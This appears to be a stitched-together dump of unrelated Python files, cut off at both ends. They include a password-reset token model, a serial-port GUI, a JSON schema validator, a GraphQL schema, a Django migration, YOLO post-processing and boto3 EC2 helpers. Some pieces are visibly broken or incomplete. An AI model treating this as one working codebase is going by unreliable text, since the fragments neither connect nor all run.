if agent and agent.ID == ID: cwu.add(hu)
def _design(self):
self._load_chilled_water_utilities()
cwu = self.chilled_water_utilities
self.design_results['Duty'] = duty = sum([i.duty for i in cwu])
hu_cooling, hu_chilled = self.heat_utilities
hu_chilled.mix_from(cwu)
hu_chilled.reverse()
hu_cooling(duty, 330)
used = self.ins[0]
used.mol[0] = sum([i.flow for i in cwu])
used.T = np.array([i.outlet_utility_stream.T for i in cwu]).mean()
|
''' Password reset Model '''
from api.models import db
class PasswordReset(db.Model):
'''assword reset Model class'''
__tablename__ = "password_reset_tokens"
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, db.ForeignKey('users.id'), nullable=False)
reset_token = db.Column(db.String, nullable=False)
expires_at = db.Column(
db.DateTime, default=db.func.now(), nullable=False)
created_at = db.Column(
db.DateTime, default=db.func.now(), nullable=False)
updated_at = db.Column(db.DateTime, default=db.func.now(),
server_onupdate=db.func.now(), nullable=False)
@classmethod
def save(cls, user_id, token):
'''
Save reset token
'''
reset_token = cls(user_id=user_id, reset_token=token)
db.session.add(reset_token)
db.session.commit()
@classmethod
def delete(cls, token_id):
'''
Delete reset token
'''
reset_token = cls.query.get(token_id)
db.session.delete(reset_token)
db.session.commit()
|
#!/usr/bin/python
# import packages
import Tkinter as tk # for the GUI
import ttk # for nicer GUI widgets
import tkMessageBox # for GUI testbox
import serial # for communication with serial port
import time # for time stuff
import threading # for parallel computing
import traceback
import numpy as np
import struct
import datetime
import serial
import time
# A thread that continously request the status of the MWG
class myThread (threading.Thread):
# initialize class
def __init__(self, ser,port):
threading.Thread.__init__(self)
# Initialize port
self.port = port
# # gets called when thread is started with .start()
def run(self):
mHeader = ttk.Label(root, text = "CODA synchronization").grid(row=0, column=1)
start_button = ttk.Button(root, text ="START", command = lambda : send_coda_msg('start')).grid(row=1, column=1)
accept_button = ttk.Button(root, text ="ACCEPT", command = lambda: send_coda_msg('accept')).grid(row=1, column=2)
reject_button = ttk.Button(root, text ="REJECT", command = lambda: send_coda_msg('reject')).grid(row=1, column=3)
def send_coda_msg(msg):
# print "trial count" , trial_count
if msg == 'accept':
print 'accept'
word = 0
word_str = 'c' + struct.pack('<H', word)
port.write(word_str)
time.sleep(0.05)
trial_count = 2
word = trial_count % 8
word_str = 'c' + struct.pack('<H', word)
port.write(word_str)
time.sleep(0.05)
word = 0
word_str = 'c' + struct.pack('<H', word)
port.write(word_str)
elif msg == 'reject':
print 'reject'
word = 0
word_str = 'c' + struct.pack('<H', word)
port.write(word_str)
time.sleep(0.05)
trial_count = 4
word = trial_count % 8
word_str = 'c' + struct.pack('<H', word)
port.write(word_str)
time.sleep(0.05)
word = 0
word_str = 'c' + struct.pack('<H', word)
port.write(word_str)
elif msg == 'start':
print 'start'
trial_count = 1
word = trial_count % 8
#send a 'c' for 'coda' to arduino:
word_str = 'c' + struct.pack('<H', word)
port.write(word_str)
return
port = serial.Serial('/dev/arduino_neurosync', baudrate=115200)
# set up root window
root = tk.Tk()
root.geometry("350x50")
root.title("CODA synchronization")
# wait
time.sleep(1)
# call and start update-thread
thread1 = myThread("Updating", port)
thread1.start()
# start GUI
root.mainloop()
|
"""
# -------------------------------------------------------------------------------
# Name: JSON Schema Validation
# Purpose: Shared JSON Schema Validation for Input JSONS
#
#
# Author: Moe Maysami
#
# Created: Nov 2019
# Licence: See Git
# -------------------------------------------------------------------------------
"""
import platform
from os.path import join, dirname, isabs, exists
import logging
import time
import json
import jsonref
from fastjsonschema import compile as fjs_compile, validate as fjs_validate
from fastjsonschema.exceptions import JsonSchemaException as fjs_JsonSchemaException
from jsonschema import validate, ValidationError
from jsonschema.validators import validator_for
__all__ = ['Json_Validator']
logIt = True
if logIt:
loggingConfig = {'level': logging.DEBUG,
'format': '[%(asctime)s][%(levelname)s]:%(message)s',
'datefmt': '%m/%d/%Y %I:%M:%S %p'
}
logging.basicConfig(**loggingConfig)
logger = logging.getLogger(__name__)
# -----------------------------------------
# Init. Folder/File Constants
# -----------------------------------------
folder_schema = join('..', 'schema', 'nested')
file_schema = 'schema_nested.json'
# file_valid = 'sample_valid.json'
# file_invalid = 'sample_invalid.json'
# ======================================================================
# Decorators
# ======================================================================
def timeit(method):
def timed(*args, **kw):
ts = time.perf_counter()
result = method(*args, **kw)
te = time.perf_counter()
if 'log_time' in kw:
name = kw.get('log_name', method.__name__.upper())
kw['log_time'][name] = int((te - ts) * 1000)
else:
logger.info('%6s<--- %s function executed in %2.2f ms' % ("",
method.__name__,
(te - ts) * 1000))
# print('%6s<--- %s function executed in %2.2f ms' % ("",
# method.__name__,
# (te - ts) * 1000))
return result
return timed
# ======================================================================
# JSON Validation Class
# ======================================================================
class Json_Validator(object):
"""
Class of JSON Schema Validation for GM and Sub-Models
Note1: benchmarks based on https://www.peterbe.com/plog/jsonschema-validate-10x-faster-in-python
Note2: Inferring schemas from examples using https://jsonschema.net
Note3: Defining complex/referenced schema based on https://medium.com/grammofy/handling-complex-json-schemas-in-python-9eacc04a60cf
# json Schema
# validate(instance, schema, cls=None)
# Raises
# jsonschema.exceptions.ValidationError – is invalid
# jsonschema.exceptions.SchemaError – is invalid
#
# cls (IValidator) – The class that will be used to validate the instance.
# If schema has a $schema property with a known meta-schema, the proper validator will be used.
# It is recommended that all schemas contain $schema properties for this reason.
#
# class jsonschema.IValidator(schema, types=(), resolver=None, format_checker=None)
"""
# ----------------------------------------------------------------------
def __init__(self, schema_file=join(folder_schema, file_schema)):
# Find Absolute Path of schema_file
if not isabs(schema_file):
schema_file = join(dirname(__file__), schema_file)
if not exists(schema_file):
raise ValueError("Cannot create class instance with no/missing schema file.")
# Message for Invalid Jsons
self.message = "%8s******** WARNING: JSON data is invalid based on schema ********" % ("")
# Read Schema from JSON Schema File
self.schema_file = schema_file
# Load schema from file to class
# Notes: https://github.com/Julian/jsonschema/issues/98#issuecomment-105475109
# with open(os.path.join(absolute_path_to_base_directory, base_filename)) as file_object:
# schema = json.load(file_object)
# resolver = jsonschema.RefResolver('file:///' + absolute_path_to_base_directory.replace("\\", "/") + '/', schema)
# jsonschema.Draft4Validator(schema, resolver=resolver).validate(data)
base_path = dirname(self.schema_file)
if platform.system().lower() in ["windows"]:
base_uri = 'file:///{}/'.format(base_path.replace("\\", "/"))
elif platform.system().lower() in ["linux"]:
base_uri = 'file://{}/'.format(base_path.replace("\\", "/"))
with open(self.schema_file) as schema_file:
# self.schema = json.loads(schema_file.read())
self.schema = jsonref.loads(schema_file.read(), base_uri=base_uri, jsonschema=True)
# Create JS Validator
self.validator = validator_for(self.schema)
self.validator.check_schema(self.schema)
self.validator_fast = self.validator(self.schema)
# Create Fast JS Validator
self.validator_fjs = fjs_compile(self.schema)
# ----------------------------------------------------------------------
@timeit
def validate(self, json_input):
"""
Fast Deployment Using JsonSchema
:param json_input: Json data to be validated
:return: Boolean Valid Flag
"""
try:
self.validator_fast.validate(json_input)
except ValidationError as err:
print(self.message)
print(err)
return False
return True
# ----------------------------------------------------------------------
@timeit
def validate_fjs(self, json_input):
"""
Fast Deployment Using FastJsonSchema
:param json_input: Json data to be validated
:return: Boolean Valid Flag
"""
try:
self.validator_fjs(json_input)
except fjs_JsonSchemaException as err:
print(self.message)
print(err)
return False
return True
# ----------------------------------------------------------------------
@timeit
def _validate1(self, json_input):
"""
Slow Aux Deployment Using JsonSchema
:param json_input: Json data to be validated
:return: Boolean Valid Flag
"""
try:
validate(json_input, self.schema, cls=self.validator)
except ValidationError as err:
print(self.message)
print(err)
return False
return True
# ----------------------------------------------------------------------
@timeit
def _validate2(self, json_input):
"""
Slow Aux Deployment Using JsonSchema
:param json_input: Json data to be validated
:return: Boolean Valid Flag
"""
try:
validate(json_input, self.schema)
except ValidationError as err:
print(self.message)
print(err)
return False
return True
# ----------------------------------------------------------------------
@timeit
def _validate3(self, json_input):
"""
Slow Aux Deployment Using FastJsonSchema
:param json_input: Json data to be validated
:return: Boolean Valid Flag
"""
try:
fjs_validate(self.schema, json_input)
except fjs_JsonSchemaException as err:
print(self.message)
print(err)
return False
return True
# --------------------------------------------------------------------------------------
# ======================================================================================
# ========== MAIN ==========
# ======================================================================================
# --------------------------------------------------------------------------------------
# Running independent benchmarks of schema validator class
if __name__ == '__main__':
# Unified Nested Schema
folder_test = join('..', 'schema', 'flat')
file_test = 'schema_flat.json'
test_valid = 'sample_valid.json'
test_invalid = 'sample_invalid.json'
# Complex (Referenced) Nested Schema
folder_test = join('..','schema', 'nested')
file_test = 'schema_nested.json'
test_valid = 'sample_valid.json'
test_invalid = 'sample_invalid.json'
logger.info("%2s===> JSON Validation Class" % (""))
relative_path = join(folder_test, test_invalid)
absolute_path = join(dirname(__file__), relative_path)
logger.info("%6s---> Reading JSON Data File: %s" % ("", absolute_path))
with open(absolute_path) as json_data_file:
json_data = json.loads(json_data_file.read())
logger.info("%6s---> Create Validator Class Instance" % (""))
jv = Json_Validator(join(folder_test, file_test))
logger.info("\n" + "-" * 75)
logger.info("%6s---> Validation Function Json Schema" % (""))
jv.validate(json_data)
logger.info("\n" + "-" * 75)
logger.info("%6s---> Validation Function Fast Json Schema" % (""))
jv.validate_fjs(json_data)
logger.info("\n" + "-" * 75)
logger.info("%6s---> Validation Function Benchmark _1" % (""))
jv._validate1(json_data)
logger.info("\n" + "-" * 75)
logger.info("%6s---> Validation Function Benchmark _2" % (""))
jv._validate2(json_data)
logger.info("\n" + "-" * 75)
logger.info("%6s---> Validation Function Benchmark _3" % (""))
jv._validate3(json_data)
logger.info("\n" + "-" * 75)
logger.info("%2s<=== Validation Completed" % (""))
|
import graphene
from graphene import relay
from graphene_django.filter import DjangoFilterConnectionField
from graphql_jwt.decorators import login_required
from .models import Item, Picture, Storage
from .mutations import (
AddConsumableMutation,
AddItemMutation,
AddPictureMutation,
AddStorageMutation,
DeleteConsumableMutation,
DeleteItemMutation,
DeletePictureMutation,
DeleteStorageMutation,
RestoreItemMutation,
UpdateItemMutation,
UpdatePictureMutation,
UpdateStorageMutation,
)
from .types import (
ItemFilter,
ItemType,
PictureFilter,
PictureType,
StorageFilter,
StorageType,
)
class Query(graphene.ObjectType):
item = relay.Node.Field(ItemType)
items = DjangoFilterConnectionField(ItemType, filterset_class=ItemFilter)
storage = relay.Node.Field(StorageType)
storages = DjangoFilterConnectionField(StorageType, filterset_class=StorageFilter)
picture = relay.Node.Field(PictureType)
pictures = DjangoFilterConnectionField(PictureType, filterset_class=PictureFilter)
@login_required
def resolve_items(self, info, **args):
return Item.objects.all()
@login_required
def resolve_storages(self, info, **args):
return Storage.objects.all()
@login_required
def resolve_pictures(self, info, **args):
return Picture.objects.all()
class Mutation(graphene.ObjectType):
update_storage = UpdateStorageMutation.Field()
update_item = UpdateItemMutation.Field()
add_storage = AddStorageMutation.Field()
add_item = AddItemMutation.Field()
delete_storage = DeleteStorageMutation.Field()
delete_item = DeleteItemMutation.Field()
restore_item = RestoreItemMutation.Field()
add_consumable = AddConsumableMutation.Field()
delete_consumable = DeleteConsumableMutation.Field()
add_picture = AddPictureMutation.Field()
delete_picture = DeletePictureMutation.Field()
update_picture = UpdatePictureMutation.Field()
|
from py2neo import Graph
graph = Graph("http://192.168.50.52:7475/db/data/")
graph.cypher.execute("MATCH (n:_Network_Node)-[:Edge]-(x) WITH n, count(DISTINCT x) as degree SET n.degree = degree")
# for record in res:
# print record;
|
meters_that_will_be_landscaped = float(input())
the_price_for_landsacping = meters_that_will_be_landscaped * 7.61
discount = the_price_for_landsacping * 0.18
total_price = the_price_for_landsacping - discount
print(f"the total price is {total_price}")
print(f"discount is {discount}") |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-01 11:21
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Answer',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('text', models.CharField(max_length=128)),
],
),
migrations.CreateModel(
name='AnswerCategoryWeighting',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('weighting', models.FloatField()),
('answer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Answer')),
],
),
migrations.CreateModel(
name='ApproachCultureCategory',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=128, unique=True)),
],
),
migrations.CreateModel(
name='DidYouKnowQuestion',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('text', models.CharField(max_length=256)),
('approach_culture', models.ManyToManyField(blank=True, to='operaQuizbot.ApproachCultureCategory')),
],
),
migrations.CreateModel(
name='FacebookPage',
fields=[
('facebook_id', models.BigIntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=256)),
],
options={
'verbose_name': 'Facebook Page',
},
),
migrations.CreateModel(
name='FinancialCategory',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=128, unique=True)),
],
),
migrations.CreateModel(
name='Opera',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=128)),
],
),
migrations.CreateModel(
name='OperaCategory',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=128)),
],
),
migrations.CreateModel(
name='OperaGoerCategory',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=128, unique=True)),
],
),
migrations.CreateModel(
name='Performance',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('datetime', models.DateTimeField()),
('opera', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Opera')),
],
),
migrations.CreateModel(
name='Profile',
fields=[
('facebook_psid', models.BigIntegerField(primary_key=True, serialize=False)),
('first_name', models.CharField(max_length=128)),
('last_name', models.CharField(max_length=128)),
('approach_culture', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.ApproachCultureCategory')),
('financial', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.FinancialCategory')),
('likes', models.ManyToManyField(to='operaQuizbot.FacebookPage', verbose_name='Facebook Likes')),
('opera_goer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.OperaGoerCategory')),
],
options={
'verbose_name': 'User',
},
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('text', models.CharField(max_length=128)),
('next_question', models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Question')),
],
),
migrations.CreateModel(
name='ReceivedMessage',
fields=[
('id', models.CharField(max_length=128, primary_key=True, serialize=False)),
],
),
migrations.CreateModel(
name='UserAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('answer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Answer')),
('profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Profile')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Question')),
],
),
migrations.AddField(
model_name='profile',
name='recorded_answers',
field=models.ManyToManyField(through='operaQuizbot.UserAnswer', to='operaQuizbot.Question'),
),
migrations.AddField(
model_name='profile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='opera',
name='categories',
field=models.ManyToManyField(to='operaQuizbot.OperaCategory'),
),
migrations.AddField(
model_name='facebookpage',
name='categories',
field=models.ManyToManyField(to='operaQuizbot.OperaCategory'),
),
migrations.AddField(
model_name='didyouknowquestion',
name='financial',
field=models.ManyToManyField(blank=True, to='operaQuizbot.FinancialCategory'),
),
migrations.AddField(
model_name='didyouknowquestion',
name='opera_goer',
field=models.ManyToManyField(blank=True, to='operaQuizbot.OperaGoerCategory'),
),
migrations.AddField(
model_name='answercategoryweighting',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.OperaCategory'),
),
migrations.AddField(
model_name='answer',
name='categories',
field=models.ManyToManyField(through='operaQuizbot.AnswerCategoryWeighting', to='operaQuizbot.OperaCategory'),
),
migrations.AddField(
model_name='answer',
name='question',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='operaQuizbot.Question'),
),
migrations.AlterUniqueTogether(
name='useranswer',
unique_together=set([('question', 'profile')]),
),
]
|
from boundingbox import BoundingBox
import cv2
import numpy as np
def preprocess(img, input_shape, letter_box=False):
"""Preprocess an image before TRT YOLO inferencing.
# Args
img: int8 numpy array of shape (img_h, img_w, 3)
input_shape: a tuple of (H, W)
letter_box: boolean, specifies whether to keep aspect ratio and
create a "letterboxed" image for inference
# Returns
preprocessed img: float32 numpy array of shape (3, H, W)
"""
if letter_box:
img_h, img_w, _ = img.shape
new_h, new_w = input_shape[0], input_shape[1]
offset_h, offset_w = 0, 0
if (new_w / img_w) <= (new_h / img_h):
new_h = int(img_h * new_w / img_w)
offset_h = (input_shape[0] - new_h) // 2
else:
new_w = int(img_w * new_h / img_h)
offset_w = (input_shape[1] - new_w) // 2
resized = cv2.resize(img, (new_w, new_h))
img = np.full((input_shape[0], input_shape[1], 3), 127, dtype=np.uint8)
img[offset_h:(offset_h + new_h), offset_w:(offset_w + new_w), :] = resized
else:
img = cv2.resize(img, (input_shape[1], input_shape[0]))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.transpose((2, 0, 1)).astype(np.float32)
img /= 255.0
return img
def _nms_boxes(detections, nms_threshold):
"""Apply the Non-Maximum Suppression (NMS) algorithm on the bounding
boxes with their confidence scores and return an array with the
indexes of the bounding boxes we want to keep.
# Args
detections: Nx7 numpy arrays of
[[x, y, w, h, box_confidence, class_id, class_prob],
......]
"""
x_coord = detections[:, 0]
y_coord = detections[:, 1]
width = detections[:, 2]
height = detections[:, 3]
box_confidences = detections[:, 4] * detections[:, 6]
areas = width * height
ordered = box_confidences.argsort()[::-1]
keep = list()
while ordered.size > 0:
# Index of the current element:
i = ordered[0]
keep.append(i)
xx1 = np.maximum(x_coord[i], x_coord[ordered[1:]])
yy1 = np.maximum(y_coord[i], y_coord[ordered[1:]])
xx2 = np.minimum(x_coord[i] + width[i], x_coord[ordered[1:]] + width[ordered[1:]])
yy2 = np.minimum(y_coord[i] + height[i], y_coord[ordered[1:]] + height[ordered[1:]])
width1 = np.maximum(0.0, xx2 - xx1 + 1)
height1 = np.maximum(0.0, yy2 - yy1 + 1)
intersection = width1 * height1
union = (areas[i] + areas[ordered[1:]] - intersection)
iou = intersection / union
indexes = np.where(iou <= nms_threshold)[0]
ordered = ordered[indexes + 1]
keep = np.array(keep)
return keep
def postprocess(output, img_w, img_h, input_shape, conf_th=0.8, nms_threshold=0.5, letter_box=False):
"""Postprocess TensorRT outputs.
# Args
output: list of detections with schema [x, y, w, h, box_confidence, class_id, class_prob]
conf_th: confidence threshold
letter_box: boolean, referring to _preprocess_yolo()
# Returns
list of bounding boxes with all detections above threshold and after nms, see class BoundingBox
"""
# filter low-conf detections
detections = output.reshape((-1, 7))
detections = detections[detections[:, 4] * detections[:, 6] >= conf_th]
if len(detections) == 0:
boxes = np.zeros((0, 4), dtype=np.int)
scores = np.zeros((0,), dtype=np.float32)
classes = np.zeros((0,), dtype=np.float32)
else:
box_scores = detections[:, 4] * detections[:, 6]
# scale x, y, w, h from [0, 1] to pixel values
old_h, old_w = img_h, img_w
offset_h, offset_w = 0, 0
if letter_box:
if (img_w / input_shape[1]) >= (img_h / input_shape[0]):
old_h = int(input_shape[0] * img_w / input_shape[1])
offset_h = (old_h - img_h) // 2
else:
old_w = int(input_shape[1] * img_h / input_shape[0])
offset_w = (old_w - img_w) // 2
detections[:, 0:4] *= np.array(
[old_w, old_h, old_w, old_h], dtype=np.float32)
# NMS
nms_detections = np.zeros((0, 7), dtype=detections.dtype)
for class_id in set(detections[:, 5]):
idxs = np.where(detections[:, 5] == class_id)
cls_detections = detections[idxs]
keep = _nms_boxes(cls_detections, nms_threshold)
nms_detections = np.concatenate(
[nms_detections, cls_detections[keep]], axis=0)
xx = nms_detections[:, 0].reshape(-1, 1)
yy = nms_detections[:, 1].reshape(-1, 1)
if letter_box:
xx = xx - offset_w
yy = yy - offset_h
ww = nms_detections[:, 2].reshape(-1, 1)
hh = nms_detections[:, 3].reshape(-1, 1)
boxes = np.concatenate([xx, yy, xx+ww, yy+hh], axis=1) + 0.5
boxes = boxes.astype(np.int)
scores = nms_detections[:, 4] * nms_detections[:, 6]
classes = nms_detections[:, 5].astype(np.int)
detected_objects = []
for box, score, label in zip(boxes, scores, classes):
detected_objects.append(BoundingBox(label, score, box[0], box[2], box[1], box[3], img_w, img_h))
return detected_objects
|
import boto3
import pprint
pp = pprint.PrettyPrinter()
client = boto3.client('ec2')
ec2 = boto3.resource('ec2')
def get_all_vpcs():
return client.describe_vpcs()['Vpcs']
def get_vpc_by_name(vpc_name):
matched_vpc = None
vpcs = get_all_vpcs()
for vpc in vpcs:
names = [tag['Value'] for tag in vpc['Tags'] if tag['Key'] == 'Name']
if len(names) > 0 and names[0] == vpc_name:
matched_vpc = vpc
break
return matched_vpc
def get_all_my_images():
return client.describe_images(Owners=['self'])['Images']
def get_image_by_name(image_name):
matched_image = None
images = [image for image in get_all_my_images() if image['Name'] == image_name]
if len(images) > 0:
matched_image = images[0]
return matched_image
def get_blockdevice_from_image(image_name):
blockdevice = None
image = get_image_by_name(image_name)
if image is not None:
blockdevice = image['BlockDeviceMapping']
return blockdevice
def get_all_subnets():
return client.describe_subnets()['Subnets']
def get_subnet_by_cidr(cidr):
matched_subnet = None
subnets = [subnet for subnet in get_all_subnets() if subnet['CidrBlock'] == cidr]
if len(subnets) > 0:
matched_subnet = subnets[0]
return matched_subnet
def get_subnet_by_name(name):
matched_subnet = None
subnets = get_all_subnets()
for subnet in subnets:
names = [tag['Value'] for tag in subnet['Tags'] if tag['Key'] == 'Name']
if len(names) > 0 and names[0] == name:
matched_subnet = subnet
break
return matched_subnet
def get_all_security_groups():
return client.describe_security_groups()['SecurityGroups']
def get_security_groups_by_names(names):
return [group for group in get_all_security_groups() if group['GroupName'] in names]
def make_network_interface(subnet_name, private_ip, security_groups, index=0):
subnet = get_subnet_by_name(subnet_name)
security_group_ids = [ group['GroupId'] for group in get_security_groups_by_names(security_groups) ]
return {
'DeviceIndex': index,
'SubnetId': subnet['SubnetId'],
'PrivateIpAddress': private_ip,
'AssociatePublicIpAddress': True,
'Groups': security_group_ids
}
def create_instance(instance_type, image_name, key_name, network_interface):
image = get_image_by_name(image_name)
return ec2.create_instances(
ImageId=image['ImageId'],
MinCount=1,MaxCount=1,
KeyName=key_name,
InstanceType=instance_type,
NetworkInterfaces=[network_interface]
)
def create_codealley_mesos_slave(private_ip, instance_type='t2.medium'):
# from config
image_name = 'mesos-slave-base-ami'
key_name = 'codealley_aws_oregon'
subnet_name = 'codealley-pub-subnet1'
security_groups = ['default', 'mesos-slave-sg', 'zabbix-agent-sg', 'elk-sg']
# end
network_interface = make_network_interface(subnet_name, private_ip, security_groups)
return create_instance(instance_type, image_name, key_name, network_interface)
def get_instance_status(instance_id):
return client.describe_instance_status(InstanceIds=[instance_id])['InstanceStatuses']
def delete_instance(instance_id):
return client.terminate_instances(InstanceIds=[instance_id])['TerminatingInstances']
#pp.pprint(get_vpc_by_name('codealley-vpc-oregon')['VpcId'])
#pp.pprint(get_image_by_name('mesos-slave-base-ami'))
#pp.pprint(get_subnet_by_name('codealley-pub-subnet1')['SubnetId'])
#pp.pprint(get_security_groups_by_names(['default', 'elk-sg']))
#pp.pprint(create_codealley_mesos_slave('10.1.100.25'))
#pp.pprint(delete_instance('i-0e3d51298e3be38c3'))
#pp.pprint(get_instance_status('i-0e3d51298e3be38c3'))
# block device
# DeviceNa
# create instance
# DrypRun=True
# ImageId='string'
# MinCount=1
# MaxCount=1
# KeyName='string'
# InstanceType='t2.medium'
# Placement=Placement
# PrivateIpAddress='string'
# SecurityGroupIds=['string', 'string']
# SubnetId='string'
# BlockDeviceMapping=BlockDeviceMapping |
from django.contrib import admin
from .models import *
class DoctorAdmin(admin.ModelAdmin):
list_display = ('id', 'last_name', 'name', 'middle_name', 'image')
search_fields = ('last_name',)
class TitleAdmin(admin.ModelAdmin):
list_display = ('id', 'title')
admin.site.register(Title, TitleAdmin)
admin.site.register(Doctor, DoctorAdmin)
|
data_path = "../data"
|
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE
from awkward._v2.operations.structure.copy import copy # noqa: F401
from awkward._v2.operations.structure.mask import mask # noqa: F401
from awkward._v2.operations.structure.num import num # noqa: F401
from awkward._v2.operations.structure.run_lengths import run_lengths # noqa: F401
from awkward._v2.operations.structure.zip import zip # noqa: F401
from awkward._v2.operations.structure.unzip import unzip # noqa: F401
from awkward._v2.operations.structure.to_regular import to_regular # noqa: F401
from awkward._v2.operations.structure.from_regular import from_regular # noqa: F401
from awkward._v2.operations.structure.with_name import with_name # noqa: F401
from awkward._v2.operations.structure.with_field import with_field # noqa: F401
from awkward._v2.operations.structure.with_parameter import with_parameter # noqa: F401
from awkward._v2.operations.structure.without_parameters import ( # noqa: F401
without_parameters,
)
from awkward._v2.operations.structure.zeros_like import zeros_like # noqa: F401
from awkward._v2.operations.structure.ones_like import ones_like # noqa: F401
from awkward._v2.operations.structure.full_like import full_like # noqa: F401
from awkward._v2.operations.structure.broadcast_arrays import ( # noqa: F401
broadcast_arrays,
)
from awkward._v2.operations.structure.concatenate import concatenate # noqa: F401
from awkward._v2.operations.structure.where import where # noqa: F401
from awkward._v2.operations.structure.flatten import flatten # noqa: F401
from awkward._v2.operations.structure.unflatten import unflatten # noqa: F401
from awkward._v2.operations.structure.ravel import ravel # noqa: F401
from awkward._v2.operations.structure.packed import packed # noqa: F401
from awkward._v2.operations.structure.local_index import local_index # noqa: F401
from awkward._v2.operations.structure.sort import sort # noqa: F401
from awkward._v2.operations.structure.argsort import argsort # noqa: F401
from awkward._v2.operations.structure.pad_none import pad_none # noqa: F401
from awkward._v2.operations.structure.fill_none import fill_none # noqa: F401
from awkward._v2.operations.structure.is_none import is_none # noqa: F401
from awkward._v2.operations.structure.singletons import singletons # noqa: F401
from awkward._v2.operations.structure.firsts import firsts # noqa: F401
from awkward._v2.operations.structure.cartesian import cartesian # noqa: F401
from awkward._v2.operations.structure.argcartesian import argcartesian # noqa: F401
from awkward._v2.operations.structure.combinations import combinations # noqa: F401
from awkward._v2.operations.structure.argcombinations import ( # noqa: F401
argcombinations,
)
from awkward._v2.operations.structure.nan_to_num import nan_to_num # noqa: F401
from awkward._v2.operations.structure.isclose import isclose # noqa: F401
from awkward._v2.operations.structure.values_astype import values_astype # noqa: F401
from awkward._v2.operations.structure.strings_astype import strings_astype # noqa: F401
|
from pathlib import PosixPath
import numpy
from osgeo import gdal
from osgeo import osr
from .image_output import SimpleImageOutput
from .resampler import get_resampler
from .utils import ensure_dir_exists, gdal_write
class GDAL2Tiles:
def __init__(
self,
source_path, output_dir,
min_zoom=None, max_zoom=None,
resampling_method='average',
source_srs=None, source_nodata=None,
tile_size=256
):
self.source_path = PosixPath(source_path)
self.output_dir = PosixPath(output_dir)
self.min_zoom = min_zoom
self.max_zoom = max_zoom
self.resampling_method = resampling_method
self.source_srs = source_srs
self.source_nodata = source_nodata
# Tile format
self.tile_size = tile_size
# Should we read bigger window of the input raster and scale it down?
# Note: Modified later by open_input()
# Not for 'near' resampling
# Not for Wavelet based drivers (JPEG2000, ECW, MrSID)
# Not for 'raster' profile
self.scaledquery = True
self.write_method = gdal_write
# Should we use Read on the input file for generating overview tiles?
# Note: Modified later by open_input()
# Otherwise the overview tiles are generated from
# existing underlying tiles
self.overviewquery = False
self.check_resampling_method_availability()
self.set_querysize()
def set_querysize(self):
# How big should be query window be for scaling down
# Later on reset according the chosen resampling algorightm
if self.resampling_method == 'near':
self.querysize = self.tile_size
elif self.resampling_method == 'bilinear':
self.querysize = self.tile_size * 2
else:
self.querysize = 4 * self.tile_size
def check_resampling_method_availability(self):
# Supported options
if self.resampling_method == 'average':
try:
gdal.RegenerateOverview
except Exception:
raise Exception(
"'average' resampling algorithm is not available.",
"Please use -r 'near' argument or upgrade to newer version of GDAL."
)
elif self.resampling_method == 'antialias':
try:
numpy
except Exception:
raise Exception(
"'antialias' resampling algorithm is not available.",
"Install PIL (Python Imaging Library) and numpy."
)
# -------------------------------------------------------------------------
def process(self):
# Opening and preprocessing of the input file
self.open_input()
# Generation of the lowest tiles
self.generate_base_tiles()
# Generation of the overview tiles (higher in the pyramid)
self.generate_overview_tiles()
def open_input(self):
"""Initialization of the input raster, reprojection if necessary"""
self.initialize_input_raster()
self.set_out_srs()
self.out_ds = None
self.reproject_if_necessary()
if not self.out_ds:
self.out_ds = self.in_ds
self.instantiate_image_output()
self.configure_bounds()
self.adjust_zoom()
self.calculate_ranges_for_tiles()
def reproject_if_necessary(self):
pass
def initialize_input_raster(self):
gdal.SetConfigOption("GDAL_PAM_ENABLED", "NO")
gdal.AllRegister()
# Open the input file
self.in_ds = gdal.Open(str(self.source_path), gdal.GA_ReadOnly)
if not self.in_ds:
# Note: GDAL prints the ERROR message too
raise Exception(
'It is not possible to open the '
f'input file "{self.source_path}".'
)
# Read metadata from the input file
if self.in_ds.RasterCount == 0:
raise Exception("Input file '%s' has no raster band" % self.source_path)
if self.in_ds.GetRasterBand(1).GetRasterColorTable():
# TODO: Process directly paletted dataset by generating VRT in memory
raise Exception(
"Please convert this file to RGB/RGBA and run gdal2tiles on the result.",
